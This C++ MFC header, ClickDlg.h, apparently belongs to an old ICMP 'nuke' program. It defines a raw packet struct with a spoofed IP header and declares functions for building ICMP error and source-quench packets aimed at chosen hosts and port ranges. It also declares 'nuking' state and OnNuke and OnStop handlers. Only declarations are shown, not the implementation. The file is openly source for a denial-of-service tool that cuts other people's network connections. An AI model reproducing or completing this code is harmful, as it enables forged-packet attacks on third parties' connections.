// ClickDlg.h : header file
//

// Struct rhad_icmp
struct rhad_icmp {
			unsigned char icmp_type;
			unsigned char icmp_code;
			unsigned short icmp_cksum;
			unsigned long filler;
			unsigned char V_h_len;   // Version and header length 4 bits each
			unsigned char Prec_TOS;  // upper 3 bits - precedence (7!) TOS- lower 5 bits = 4 for MAXIMUM reliability (11100100 - 228)
			unsigned short length;
			unsigned short identification;
			unsigned short Flags_FRGO;  //flags and frag offset - 0
			unsigned char TTL;	// time to live
			unsigned char PROT; //protocal type 6 - TCP
			unsigned short H_CHK; // Header checksum  - 0
			struct in_addr IP_SRC; //  LongIP
			struct in_addr IP_DEST; // LongIP
			unsigned short s_port; // source port
			unsigned short d_port; // dest port
			unsigned long fill_data;
};



/////////////////////////////////////////////////////////////////////////////
// CClickDlg dialog

class CClickDlg : public CDialog
{
// Construction
public:
	CClickDlg(CWnd* pParent = NULL);	// standard constructor
// Command line
	int argc;
	char **argv;
// Status indicators for nuking
	BOOL PreInitialized,noclose;
	BOOL nuking,noact;
	BOOL advanced_cp,advanced_sp;
	unsigned short *cplist,*splist;
	unsigned short cur_cp,cur_sp;
	unsigned short max_cp,max_sp;
// Nuke stuff
	unsigned long host1_addr,host2_addr;
	unsigned short host1_st,host1_sp,host2_st,host2_sp;
	unsigned short current_1,current_2;
	unsigned short error_type,packets_per;
	struct sockaddr host1_sock,host2_sock;
	BOOL client_side;
// Socket
	SOCKET s,t;
// Icmp packet
	struct rhad_icmp *nuke_s;

// Dialog Data
	//{{AFX_DATA(CClickDlg)
	enum { IDD = IDD_CLICK_DIALOG };
		// NOTE: the ClassWizard will add data members here
	//}}AFX_DATA

	// ClassWizard generated virtual function overrides
	//{{AFX_VIRTUAL(CClickDlg)
	protected:
	virtual void DoDataExchange(CDataExchange* pDX);	// DDX/DDV support
	//}}AFX_VIRTUAL

// Implementation
protected:
	HICON m_hIcon;

	virtual int MakePacket(unsigned long src,unsigned long dst,
						   unsigned short src_port,unsigned short dst_port,
						   unsigned char error_code,struct sockaddr *dest);
	virtual int MakeSQUENCH(unsigned long src,unsigned long dst,
						   unsigned short src_port,unsigned short dst_port,
						   struct sockaddr *dest);
	virtual int MakeOPTION(unsigned long src,unsigned long dst,
						   unsigned short src_port,unsigned short dst_port,
						   struct sockaddr *dest);

	virtual void LoadServers(void);
	virtual u_short cksum( u_short *buf, int nwords );
	virtual BOOL resolve_address(struct sockaddr * addr, char *hostname, u_short port);
	virtual void InitPacket(void);
	// command line
	virtual	BOOL HasRange(char *parstr);
	virtual int CountSeg(char *parstr);
	virtual int Countports(char *parstr);
	virtual void AddToList(unsigned short *list,unsigned short *cur,char *astr);
	virtual unsigned short *Setportlist(unsigned short *maxp,char *parstr);
	virtual unsigned short GetNextSP(void);
	virtual unsigned short GetNextCP(void);


	
	// Generated message map functions
	//{{AFX_MSG(CClickDlg)
	virtual BOOL OnInitDialog();
	afx_msg void OnSysCommand(UINT nID, LPARAM lParam);
	afx_msg void OnPaint();
	afx_msg HCURSOR OnQueryDragIcon();
	afx_msg void OnExit();
	afx_msg void OnClientButton();
	afx_msg void OnServerButton();
	afx_msg void OnTimer(UINT nIDEvent);
	afx_msg void OnNuke();
	afx_msg void OnStop();
	afx_msg void OnDestroy();
	//}}AFX_MSG
	DECLARE_MESSAGE_MAP()
};
